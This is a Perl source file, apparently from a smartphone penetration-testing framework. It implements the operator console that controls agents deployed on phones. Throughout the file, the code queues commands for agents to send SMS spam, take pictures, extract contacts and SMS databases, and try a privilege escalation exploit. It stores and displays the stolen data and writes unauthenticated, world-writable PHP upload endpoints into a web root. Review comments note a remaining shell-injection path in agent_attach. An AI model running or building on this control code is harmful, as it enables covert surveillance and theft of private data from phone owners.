# handshake(path, key): poll WEBSERVER . path . "/connect" once a second until
# its first line equals "<key> CONNECT", then write "\n<key> CONNECTED" to the
# same handle and report success.  There is no timeout, and the result of open
# is not checked; a missing file just keeps the loop polling.
sub handshake
{
    ($path, $key) = @_[0, 1];
    $webserver = $Variables{WEBSERVER};
    $fullpath = $webserver. $path . "/connect";
    for (;;)
    {
        open(CONNECTFILE, "+<$fullpath");
        $line = <CONNECTFILE>;
        $correctstring = $key . " CONNECT";
        if ($line ne $correctstring)
        {
            # Not there yet: release the handle and try again shortly.
            close(CONNECTFILE);
            sleep(1);
            next;
        }
        $command = "\n" . $key . " CONNECTED";
        print CONNECTFILE $command;
        close(CONNECTFILE);
        print "CONNECTED!\n";
        last;
    }
}
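# database_add2(number, path, key, type): insert one row into the "modems"
# table.
#
# The four values are passed as bind parameters.  The original wrapped them in
# quote characters by hand and concatenated them into the statement (the
# postgres branch left the number unquoted), so a quote in any value changed
# the SQL.  A failed connection or an unknown DATABASETYPE is reported instead
# of ending in a method call on an undefined handle.
# The connection settings and $dbh stay package globals because other subs in
# this file read them.
# Returns the result of execute, or nothing when the row was not inserted.
sub database_add2
{
    my ($modem_number, $modem_path, $control_key, $modem_type) = @_;
    $table = "modems";
    $sqlserver = $Variables{"MYSQLSERVER"};
    $username = $Variables{"MYSQLUSER"};
    $password = $Variables{"MYSQLPASS"};
    $port = $Variables{"MYSQLPORT"};
    $type = $Variables{"DATABASETYPE"};
    $dbh = undef;
    if ($type eq "postgres")
    {
        $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver", $username, $password);
    }
    elsif ($type eq "mysql")
    {
        $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username, $password);
    }
    unless (defined $dbh)
    {
        print "Could not connect to the database; modem not stored\n";
        return;
    }
    $insertquery = "INSERT INTO $table (id,number,path,controlkey,type) VALUES (DEFAULT,?,?,?,?)";
    $sql = $dbh->prepare($insertquery);
    return unless defined $sql;
    return $sql->execute($modem_number, $modem_path, $control_key, $modem_type);
}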
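# make_files2(path): create the directory WEBSERVER . path and populate it
# with the data files and PHP upload scripts used by the modem bridge.
#
# The original built "mkdir", "touch" and "chmod 777" command strings from the
# operator-supplied path and ran each through the shell.  Perl's own mkdir,
# open and chmod are used instead, so the path is never parsed by a shell and
# failures are reported.  File names, file contents and modes are unchanged.
#
# NOTE(review): every file is still made mode 0777, so any local account can
# replace the PHP scripts.  The scripts also write whatever request parameter
# they receive into a fixed file name without authenticating the sender.
# Both should be tightened for the deployment at hand.
sub make_files2
{
    $path = $_[0];
    $webserver = $Variables{WEBSERVER};
    $fullpath = $webserver. $path;

    unless (-d $fullpath || mkdir($fullpath))
    {
        warn "Cannot create $fullpath: $!\n";
    }

    # Data files: created when missing, existing content left alone (what
    # "touch" did), then made world-writable.
    for my $name ("connect", "picture.jpg", "text.txt", "text2.txt", "getfunc", "putfunc")
    {
        my $file = $fullpath . "/" . $name;
        if (open(my $fh, ">>", $file))
        {
            close($fh);
            chmod(0777, $file) or warn "Cannot chmod $file: $!\n";
        }
        else
        {
            warn "Cannot create $file: $!\n";
        }
    }

    # Upload scripts: file name followed by the exact PHP source to write.
    my @uploaders = (
        [ "pictureupload.php",
          "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>" ],
        [ "textuploader.php",
          "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>" ],
        [ "text2uploader.php",
          "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text2.txt', 'wb');\nfwrite(\$file, \$base);\n?>" ],
        [ "connectuploader.php",
          "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('connect','wb');\nfwrite(\$file, \$base);\n?>" ],
        [ "getfuncuploader.php",
          "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('getfunc', 'wb');\nfwrite(\$file, \$base);\n?>" ],
        [ "putfuncuploader.php",
          "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('putfunc', 'wb');\nfwrite(\$file, \$base);\n?>" ],
    );
    for my $uploader (@uploaders)
    {
        my ($name, $body) = @$uploader;
        my $file = $fullpath . "/" . $name;
        my $fh;
        unless (open($fh, ">", $file))
        {
            warn "Cannot write $file: $!\n";
            next;
        }
        print {$fh} $body;
        close($fh) or warn "Cannot close $file: $!\n";
        chmod(0777, $file) or warn "Cannot chmod $file: $!\n";
    }
    return;
}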
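# view_data: list the rows of the "agents" table and show the stored data for
# the one the operator picks (get_data).  The list is shown again after each
# selection.  "0", "exit", an empty line, any other non-numeric input or end
# of input returns to the caller, as before.
#
# Changes from the original: the id is passed to the query as a bind value, a
# failed connection is reported instead of ending in a method call on an
# undefined handle, and the selection is matched as a whole number rather
# than by numeric coercion of the raw input line.
# NOTE(review): ids are assumed to run 1..COUNT(*) without gaps, as before.
sub view_data
{
    $webserver = $Variables{"WEBSERVER"};
    print "View Data Gathered from a Deployed Agent:\n\n";
    while (1)
    {
        print "\n\nAvailable Agents:\n\n";
        $sqlserver = $Variables{"MYSQLSERVER"};
        $username = $Variables{"MYSQLUSER"};
        $password = $Variables{"MYSQLPASS"};
        $port = $Variables{"MYSQLPORT"};
        $type = $Variables{"DATABASETYPE"};
        $dbh = undef;
        if ($type eq "postgres")
        {
            $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver", $username, $password);
        }
        elsif ($type eq "mysql")
        {
            $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username, $password);
        }
        unless (defined $dbh)
        {
            print "Could not connect to the database\n";
            return;
        }

        ($row) = $dbh->selectrow_array("SELECT COUNT(*) from agents");
        $row = 0 unless defined $row;
        $sql = $dbh->prepare("SELECT number from agents where id=?");
        return unless defined $sql;
        for ($i = 1; $i <= $row; $i++)
        {
            $sql->execute($i);
            ($r) = $sql->fetchrow_array();
            $sql->finish;
            print "\t" . $i . ".) " . $r . "\n";
        }
        print "\nSelect an agent to interact with or 0 to return to the previous menu.";
        print "\nspf>";
        $chosenagent = <>;
        return unless defined $chosenagent;
        chomp($chosenagent);
        $chosenagent =~ s/^\s+//;
        $chosenagent =~ s/\s+$//;
        # Anything that is not a positive whole number goes back to the menu.
        return unless $chosenagent =~ /\A[0-9]+\z/ && $chosenagent > 0;
        if ($chosenagent <= $row)
        {
            get_data($chosenagent + 0);
        }
    }
}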
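# get_data(id): print the sms, contacts, picture and root columns of the
# "data" row with the given id, then wait for Enter.
#
# One query with the id as a bind value replaces four queries that each
# concatenated the id into the SQL text.  A failed connection is reported
# instead of ending in a method call on an undefined handle.  A missing row
# prints empty fields, as before.
sub get_data
{
    $id = $_[0];
    $sqlserver = $Variables{"MYSQLSERVER"};
    $username = $Variables{"MYSQLUSER"};
    $password = $Variables{"MYSQLPASS"};
    $port = $Variables{"MYSQLPORT"};
    $type = $Variables{"DATABASETYPE"};
    $dbh = undef;
    if ($type eq "postgres")
    {
        $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver", $username, $password);
    }
    elsif ($type eq "mysql")
    {
        $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username, $password);
    }
    unless (defined $dbh)
    {
        print "Could not connect to the database\n";
        return;
    }

    # Start from empty values so a failed query cannot show a previous agent's data.
    ($smsrow, $contactsrow, $picturerow, $rootrow) = ();
    $sql = $dbh->prepare("SELECT sms, contacts, picture, root from data where id=?");
    if (defined $sql && $sql->execute($id))
    {
        ($smsrow, $contactsrow, $picturerow, $rootrow) = $sql->fetchrow_array();
        $sql->finish;
    }

    print "\n\nData:\n";
    print "SMS Database: " . $smsrow . "\n";
    print "Contacts: " . $contactsrow . "\n";
    print "Picture Location: " . $picturerow . "\n";
    print "Rooted?: " . $rootrow . "\n";
    print "Press <Enter> to continue";
    <>;
}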
# agent_attach: handler for option 1 of the main menu.  Prompts for the
# agent's phone number, control phone number, URL path, control key and
# platform.  After a "y" confirmation it creates the web-side files
# (make_files, only when a path was given), stores the agent (database_add),
# looks up the new row's id and starts "perl agentpoll.pl <path> <key> <id>"
# in a forked child.  Any other answer repeats the prompts.
# Every variable here is a package global; the sub takes no arguments.
sub agent_attach
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
print "Attach to a Deployed Agent:\n\n";
while (1)
{
print "This will set up handlers to control an agent that has already been deployed. You will need to fill in the correct configuration information for the agent including the control phone number,control key, and URL path. Leave an entry blank if that functionality is not present.\n\n";
print "Agent Phone Number:";
$phonenumber = <>;
print "Control Phone Number:";
$phonenumber2 = <>;
print "Agent URL Path:";
$path = <>;
print "Agent Control Key:";
$key = <>;
print "Agent Platform (Android/Blackberry/iPhone):";
$platform = <>;
# The values still carry their trailing newlines here, which is what
# separates the fields in the confirmation text.
print "\n\nAgent Phone Number: " . $phonenumber . "Control Phone Number: " . $phonenumber2 . "URL Path: " . $path . "Control Key: ". $key . "Platform: " . $platform . "Is this correct?(y/N):";
$correct = <>;
chomp($correct);
chomp($path);
chomp($key);
chomp($phonenumber2);
chomp($phonenumber);
# $platform is not chomped; it reaches database_add with its newline.
if (lc($correct) eq "y")
{
if ($path ne "")
{
make_files($path);
}
database_add($phonenumber,$path,$key,$phonenumber2,$platform);
$type = $Variables{"DATABASETYPE"};
# $username, $password and $port are not assigned in this sub; the connect
# calls use whatever an earlier sub left in those globals, presumably
# database_add (TODO confirm).  $dbh is not checked after connect.
# NOTE(review): the phone number is concatenated into the SQL text, quoted
# but unescaped for postgres and unquoted for mysql.
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$query2 = "SELECT id from agents where number=" . "\'" . $phonenumber . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$query2 = "SELECT id from agents where number=" . $phonenumber;
}
$sql = $dbh->prepare($query2);
$idblah = $sql->execute;
@rows = $sql->fetchrow_array();
$id = @rows[0];
# NOTE(review): $path and $key come straight from the prompt and are
# concatenated into a command string run through one-argument system(), so
# shell metacharacters in them are interpreted by the shell.
$startcommand = "perl agentpoll.pl " . $path . " " . $key . " " . $id;
$pid = fork;
die "fork failed" unless defined $pid;
if ($pid ==0)
{
# The child does not exit after system() returns; it continues to "last"
# below and returns to the caller like the parent.
system($startcommand);
}
last;
}
}
}
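# Create FILE if it does not exist (without truncating it), refresh its
# timestamps, and set its mode to 0777.
sub _spf_touch_file
{
    my ($file) = @_;
    if (open(my $fh, '>>', $file))
    {
        close($fh);
        utime(undef, undef, $file);
    }
    else
    {
        warn "Could not create $file: $!\n";
        return;
    }
    chmod(0777, $file) or warn "Could not chmod $file: $!\n";
    return;
}

# Write CONTENT to FILE, replacing any previous content, and set its mode to
# 0777.
sub _spf_write_file
{
    my ($file, $content) = @_;
    my $fh;
    unless (open($fh, '>', $file))
    {
        warn "Could not write $file: $!\n";
        return;
    }
    print {$fh} $content;
    close($fh) or warn "Could not finish writing $file: $!\n";
    chmod(0777, $file) or warn "Could not chmod $file: $!\n";
    return;
}

# Create the per-agent directory under the configured web root and populate it.
#
# Argument: the agent's URL path, appended directly to $Variables{"WEBSERVER"}.
# Creates the directory, four empty files (control, picture.jpg, text.txt,
# putfunc) and three PHP upload scripts whose text is embedded below.
#
# The directory and files are created with Perl built-ins rather than by
# passing "mkdir"/"touch"/"chmod" strings to the shell, so whitespace or shell
# metacharacters in the path are treated as part of the file name.
#
# NOTE(review): every file is left mode 0777 as before.  World-writable files
# inside a web root are broader than the uploaders appear to need, and the
# generated PHP writes a request parameter to a fixed file name without
# checking any credential; confirm which account the web server runs as and
# tighten the modes accordingly.
sub make_files
{
    $webserver = $Variables{"WEBSERVER"};
    $path = $_[0];
    $fullpath = $webserver . $path;
    unless (-d $fullpath)
    {
        mkdir($fullpath) or warn "Could not create $fullpath: $!\n";
    }

    # Empty files that the uploaders and the framework write to later.
    $controlfile = $fullpath . "/control";
    _spf_touch_file($controlfile);
    $picturefile = $fullpath . "/picture.jpg";
    _spf_touch_file($picturefile);
    $textfile = $fullpath . "/text.txt";
    _spf_touch_file($textfile);

    # Upload scripts; the PHP text is unchanged.
    $pictureupload = $fullpath . "/pictureupload.php";
    $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
    _spf_write_file($pictureupload, $pictureuploadtext);

    $textupload = $fullpath . "/textuploader.php";
    $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
    _spf_write_file($textupload, $textuploadtext);

    $controlupload = $fullpath . "/controluploader.php";
    $controluploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('control','wb');\nfwrite(\$file, \$base);\n?>";
    _spf_write_file($controlupload, $controluploadtext);

    # Command file that the menu subs write to.
    $putfile = $fullpath . "/putfunc";
    _spf_touch_file($putfile);
}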
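# Insert a new agent row and a matching empty row in the data table.
#
# Arguments, in order: agent phone number, URL path, control key, control
# phone number, platform.  Connection settings come from %Variables
# (MYSQLSERVER, MYSQLUSER, MYSQLPASS, MYSQLPORT, DATABASETYPE); only the
# "postgres" and "mysql" database types are handled.
#
# The five values are sent as bound parameters.  They were previously wrapped
# in quote characters and concatenated into the INSERT text, so a quote inside
# any value changed the statement itself.
sub database_add
{
    # Missing arguments are stored as empty strings, as before.
    my @values = map { defined $_ ? $_ : "" } @_[0 .. 4];

    $table = "agents";
    $table2 = "data";
    $sqlserver = $Variables{"MYSQLSERVER"};
    $username = $Variables{"MYSQLUSER"};
    $password = $Variables{"MYSQLPASS"};
    $port = $Variables{"MYSQLPORT"};
    $type = $Variables{"DATABASETYPE"};

    my $quote;
    if ($type eq "postgres")
    {
        $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver", $username, $password);
        $quote = "\'";
    }
    elsif ($type eq "mysql")
    {
        $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username, $password);
        $quote = "\"";
    }
    else
    {
        print "Unsupported DATABASETYPE in the configuration file\n";
        return;
    }
    unless ($dbh)
    {
        print "Could not connect to the database: $DBI::errstr\n";
        return;
    }

    # Compatibility only: these globals used to hold the quoted values, and
    # agent_attach() reads $path and $key after this call when it builds the
    # agentpoll.pl command line.  They are no longer used for the SQL below.
    $number   = $quote . $values[0] . $quote;
    $path     = $quote . $values[1] . $quote;
    $key      = $quote . $values[2] . $quote;
    $number2  = $quote . $values[3] . $quote;
    $platform = $quote . $values[4] . $quote;

    $insertquery = "INSERT INTO $table (id,number,path,controlkey,controlnumber,platform) VALUES (DEFAULT,?,?,?,?,?)";
    $insertquery2 = "INSERT INTO $table2 (id,sms,contacts,picture,root) VALUES (DEFAULT, NULL, NULL, NULL, NULL)";
    $sql = $dbh->prepare($insertquery);
    $sql->execute(@values);
    $sql2 = $dbh->prepare($insertquery2);
    $sql2->execute;
}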
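# Menu loop: list the recorded agents and hand the chosen one to
# control_agent().
#
# Each pass connects to the configured database, prints one line per agent for
# ids 1 .. COUNT(*) (ids are assumed to be contiguous, as before), and reads a
# selection from standard input.  "exit", "0" and anything else that is not a
# positive whole number return to the previous menu, which is also what the
# old numeric comparison against the string "exit" amounted to.  A number
# larger than the agent count simply shows the list again.
sub agent_control
{
    $webserver = $Variables{"WEBSERVER"};
    $ipaddress = $Variables{"IPADDRESS"};
    while (1)
    {
        print "\n\nAvailable Agents:\n\n";
        $sqlserver = $Variables{"MYSQLSERVER"};
        $username = $Variables{"MYSQLUSER"};
        $password = $Variables{"MYSQLPASS"};
        $port = $Variables{"MYSQLPORT"};
        $type = $Variables{"DATABASETYPE"};
        if ($type eq "postgres")
        {
            $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver", $username, $password);
        }
        elsif ($type eq "mysql")
        {
            $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username, $password);
        }
        # Previously a failed connect surfaced as a method call on an
        # undefined handle.
        unless ($dbh)
        {
            print "Could not connect to the database: $DBI::errstr\n";
            return;
        }

        my $count_sth = $dbh->prepare("SELECT COUNT(*) from agents");
        $results = $count_sth->execute;
        @rows = $count_sth->fetchrow_array();
        $row = $rows[0];

        # One statement, prepared once, serves both the listing and the
        # lookup of the chosen agent.
        my $agent_sth = $dbh->prepare("SELECT number, controlkey, path from agents where id=?");
        for ($i = 1; $i <= $row; $i++)
        {
            $agent_sth->execute($i);
            @rows = $agent_sth->fetchrow_array();
            $agent_sth->finish;
            $r = $rows[0];
            print "\t" . $i . ".) " . $r . "\n";
        }

        print "\nSelect an agent to interact with or 0 to return to the previous menu\n";
        print "\nspf>";
        $chosenagent = <>;
        last unless defined $chosenagent;    # end of input
        chomp($chosenagent);
        my $agent_id = ($chosenagent =~ /^\s*(\d+)\s*$/) ? $1 + 0 : 0;
        last if $agent_id == 0;
        next if $agent_id > $row;

        $agent_sth->execute($agent_id);
        @rows = $agent_sth->fetchrow_array();
        $agent_sth->finish;
        ($number, $key, $path) = @rows;
        control_agent($number, $path, $key, $agent_id);
    }
}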
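# Command menu for one agent.
#
# Arguments, in order: agent phone number, URL path, control key, agent id.
# Prints the command list, reads a selection from standard input and calls the
# matching sub (spam, picture, getcontacts, getsms or root) with the same four
# values.  "exit", "0" and any other input that is not a positive whole number
# return to the previous menu, matching what the old numeric comparison
# against the string "exit" did; an unlisted number shows the menu again.
sub control_agent
{
    # Copied once so that assignments to the same-named globals elsewhere
    # cannot change which agent this menu addresses.
    my ($agent_number, $agent_path, $agent_key, $agent_id) = @_;

    my %handler_for = (
        1 => \&spam,
        2 => \&picture,
        3 => \&getcontacts,
        4 => \&getsms,
        5 => \&root,
    );

    while (1)
    {
        $webserver = $Variables{"WEBSERVER"};
        # The key was "SQLSERVER" here; every other sub in this part of the
        # file reads "MYSQLSERVER".
        $sqlserver = $Variables{"MYSQLSERVER"};
        $ipaddress = $Variables{"IPADDRESS"};
        $number = $agent_number;
        $path = $agent_path;
        $key = $agent_key;
        $id = $agent_id;
        print "\n\nCommands:\n\n";
        print "\t1.) Send SMS\n";
        print "\t2.) Take Picture\n";
        print "\t3.) Get Contacts\n";
        print "\t4.) Get SMS Database\n";
        print "\t5.) Privilege Escalation\n";
        print "\t\nSelect a command to perform or 0 to return to the previous menu\n";
        print "\nspf>";
        $choice1 = <>;
        last unless defined $choice1;    # end of input
        chomp($choice1);
        my $selection = ($choice1 =~ /^\s*(\d+)\s*$/) ? $1 + 0 : 0;
        last if $selection == 0;

        my $handler = $handler_for{$selection};
        $handler->($agent_number, $agent_path, $agent_key, $agent_id) if $handler;
    }
}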
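# Prompt for a recipient, a message and a delivery method, then append one
# SPAM command line to the agent's putfunc file under the web root.
#
# Arguments, in order: agent phone number, URL path, control key, agent id.
# The line written is "<key> SPAM <modem|none> <method> <number> <message>".
# For "SMS" delivery a modem is required: get_modem() (defined elsewhere) is
# called and a result that compares equal to 0 is treated as "no modem", after
# which the prompts repeat.  Any delivery method other than "SMS" or "HTTP"
# also repeats the prompts.
#
# The file is opened with three-argument open on a lexical handle and the
# result is checked; a failed open used to pass silently.
sub spam
{
    my ($agent_number, $agent_path, $agent_key, $agent_id) = @_;
    $number = $agent_number;
    $path = $agent_path;
    $key = $agent_key;
    $id = $agent_id;
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    $ipaddress = $Variables{"IPADDRESS"};
    while (1)
    {
        print "\n\tSend an SMS message to another phone. Fill in the number, the message to send, and the delivery method(SMS or HTTP).\n";
        print "Number:";
        $sendnumber = <>;
        print "\nMessage:";
        $sendmessage = <>;
        print "\nDelivery Method(SMS or HTTP)";
        $deliverymethod = <>;
        return unless defined $deliverymethod;    # end of input
        chomp($sendnumber);
        chomp($sendmessage);
        chomp($deliverymethod);
        next unless $deliverymethod eq "HTTP" || $deliverymethod eq "SMS";

        my $modem_field = "none";
        if ($deliverymethod eq "SMS")
        {
            $modem = get_modem();
            if ($modem == 0)
            {
                print "\nNo modems found. Attach a modem to use this functionality\n";
                next;
            }
            $modem_field = $modem;
        }

        $command = join(" ", $agent_key, "SPAM", $modem_field, $deliverymethod, $sendnumber, $sendmessage) . "\n";
        $control = $webserver . $agent_path . "/putfunc";
        if (open(my $queue, '>>', $control))
        {
            print {$queue} $command;
            close($queue) or print "\nCould not finish writing $control: $!\n";
        }
        else
        {
            print "\nCould not open $control: $!\n";
        }
        last;
    }
}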
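# Prompt for a delivery method and a return method, then append one CONT
# command line to the agent's putfunc file under the web root.
#
# Arguments, in order: agent phone number, URL path, control key, agent id.
# The line written is "<key> CONT <delivery> <return>", followed by the modem
# value unless both methods are "HTTP".  When a modem is needed, get_modem()
# (defined elsewhere) is called once and a result that compares equal to 0 is
# treated as "no modem", after which the prompts repeat.  Methods other than
# "SMS" or "HTTP" also repeat the prompts.
#
# The four near-identical branches are folded into one path, the "No modems
# found" message no longer carries a line break in the middle of the sentence,
# and the file is opened with a checked three-argument open.
sub getcontacts
{
    my ($agent_number, $agent_path, $agent_key, $agent_id) = @_;
    $number = $agent_number;
    $path = $agent_path;
    $key = $agent_key;
    $id = $agent_id;
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    $ipaddress = $Variables{"IPADDRESS"};
    my %is_method = (SMS => 1, HTTP => 1);
    while (1)
    {
        print "\n\tGet contacts from phone with agent. Fill in the delivery method(SMS or HTTP) and return method (SMS or HTTP).\n";
        print "\nDelivery Method(SMS or HTTP)";
        print "\nspf>";
        $deliverymethod = <>;
        print "\nReturn Method(SMS or HTTP)";
        print "\nspf>";
        $returnmethod = <>;
        return unless defined $deliverymethod && defined $returnmethod;    # end of input
        chomp($deliverymethod);
        chomp($returnmethod);
        next unless $is_method{$deliverymethod} && $is_method{$returnmethod};

        my @fields = ($agent_key, "CONT", $deliverymethod, $returnmethod);
        unless ($deliverymethod eq "HTTP" && $returnmethod eq "HTTP")
        {
            $modem = get_modem();
            if ($modem == 0)
            {
                print "\nNo modems found. Attach a modem to use this functionality\n";
                next;
            }
            push @fields, $modem;
        }

        $command = join(" ", @fields) . "\n";
        $control = $webserver . $agent_path . "/putfunc";
        if (open(my $queue, '>>', $control))
        {
            print {$queue} $command;
            close($queue) or print "\nCould not finish writing $control: $!\n";
        }
        else
        {
            print "\nCould not open $control: $!\n";
        }
        last;
    }
}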
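# Prompt for a delivery method, then write one PICT command line to the
# agent's putfunc file under the web root.
#
# Arguments, in order: agent phone number, URL path, control key, agent id.
# "HTTP" writes "<key> PICT HTTP"; "SMS" writes "<key> PICT HTTP <modem>" and
# needs a modem: get_modem() (defined elsewhere) is called and a result that
# compares equal to 0 is treated as "no modem", after which the prompt
# repeats.  Any other answer also repeats the prompt.
#
# NOTE(review): this sub opens putfunc for writing ('>'), which replaces the
# file's content, while the other command writers in this part of the file
# append ('>>').  The mode is kept as it was; confirm whether discarding
# earlier lines is intended.
sub picture
{
    my ($agent_number, $agent_path, $agent_key, $agent_id) = @_;
    $number = $agent_number;
    $path = $agent_path;
    $key = $agent_key;
    $id = $agent_id;
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    $ipaddress = $Variables{"IPADDRESS"};
    while (1)
    {
        print "\n\tTake a picture and upload it to the webserver. Will upload a message if it fails.\n";
        print "Delivery Method (SMS or HTTP)";
        print "\nspf>";
        $delivery = <>;
        return unless defined $delivery;    # end of input
        chomp($delivery);
        next unless $delivery eq "HTTP" || $delivery eq "SMS";

        $command = $agent_key . " PICT HTTP";
        if ($delivery eq "SMS")
        {
            $modem = get_modem();
            if ($modem == 0)
            {
                print "\nNo modems found. Attach a modem to use this functionality\n";
                next;
            }
            $command .= " " . $modem;
        }
        $command .= "\n";

        $control = $webserver . $agent_path . "/putfunc";
        # Checked three-argument open on a lexical handle; a failed open used
        # to pass silently.
        if (open(my $queue, '>', $control))
        {
            print {$queue} $command;
            close($queue) or print "\nCould not finish writing $control: $!\n";
        }
        else
        {
            print "\nCould not open $control: $!\n";
        }
        last;
    }
}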
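# Prompt for a delivery method and a return method, then append one SMSS
# command line to the agent's putfunc file under the web root.
#
# Arguments, in order: agent phone number, URL path, control key, agent id.
# The line written is "<key> SMSS <delivery> <return>", followed by the modem
# value unless both methods are "HTTP".  When a modem is needed, get_modem()
# (defined elsewhere) is called and a result that compares equal to 0 is
# treated as "no modem", after which the prompts repeat.  Methods other than
# "SMS" or "HTTP" also repeat the prompts.
#
# The duplicated branches are folded into one path and the file is opened
# with a checked three-argument open on a lexical handle.
sub getsms
{
    my ($agent_number, $agent_path, $agent_key, $agent_id) = @_;
    $number = $agent_number;
    $path = $agent_path;
    $key = $agent_key;
    $id = $agent_id;
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    $ipaddress = $Variables{"IPADDRESS"};
    my %is_method = (SMS => 1, HTTP => 1);
    while (1)
    {
        print "\n\tGet last 10 sms from phone with agent. Fill in the delivery method(SMS or HTTP) and return method (SMS or HTTP).\n";
        print "\nDelivery Method(SMS or HTTP)";
        print "\nspf>";
        $deliverymethod = <>;
        print "\nReturn Method(SMS or HTTP)";
        print "\nspf>";
        $returnmethod = <>;
        return unless defined $deliverymethod && defined $returnmethod;    # end of input
        chomp($deliverymethod);
        chomp($returnmethod);
        next unless $is_method{$deliverymethod} && $is_method{$returnmethod};

        my @fields = ($agent_key, "SMSS", $deliverymethod, $returnmethod);
        unless ($deliverymethod eq "HTTP" && $returnmethod eq "HTTP")
        {
            $modem = get_modem();
            if ($modem == 0)
            {
                print "\nNo modems found. Attach a modem to use this functionality\n";
                next;
            }
            push @fields, $modem;
        }

        $command = join(" ", @fields) . "\n";
        $control = $webserver . $agent_path . "/putfunc";
        if (open(my $queue, '>>', $control))
        {
            print {$queue} $command;
            close($queue) or print "\nCould not finish writing $control: $!\n";
        }
        else
        {
            print "\nCould not open $control: $!\n";
        }
        last;
    }
}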
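# Prompt for a delivery method, then append one ROOT command line to the
# agent's putfunc file under the web root.
#
# Arguments, in order: agent phone number, URL path, control key, agent id.
# "HTTP" writes "<key> ROOT HTTP"; "SMS" writes "<key> ROOT HTTP <modem>" and
# needs a modem: get_modem() (defined elsewhere) is called and a result that
# compares equal to 0 is treated as "no modem", after which the prompt
# repeats.  Any other answer also repeats the prompt.
#
# The file is opened with three-argument open on a lexical handle and the
# result is checked; a failed open used to pass silently.
sub root
{
    my ($agent_number, $agent_path, $agent_key, $agent_id) = @_;
    $number = $agent_number;
    $path = $agent_path;
    $key = $agent_key;
    $id = $agent_id;
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    $ipaddress = $Variables{"IPADDRESS"};
    print "ROOT\n";
    while (1)
    {
        print "\n\tTry a privilege escalation exploit.\n";
        print "Delivery Method (SMS or HTTP)";
        print "\nspf>";
        $delivery = <>;
        return unless defined $delivery;    # end of input
        chomp($delivery);
        next unless $delivery eq "HTTP" || $delivery eq "SMS";

        $command = $agent_key . " ROOT HTTP";
        if ($delivery eq "SMS")
        {
            $modem = get_modem();
            if ($modem == 0)
            {
                print "\nNo modems found. Attach a modem to use this functionality\n";
                next;
            }
            $command .= " " . $modem;
        }
        $command .= "\n";

        $control = $webserver . $agent_path . "/putfunc";
        if (open(my $queue, '>>', $control))
        {
            print {$queue} $command;
            close($queue) or print "\nCould not finish writing $control: $!\n";
        }
        else
        {
            print "\nCould not open $control: $!\n";
        }
        last;
    }
}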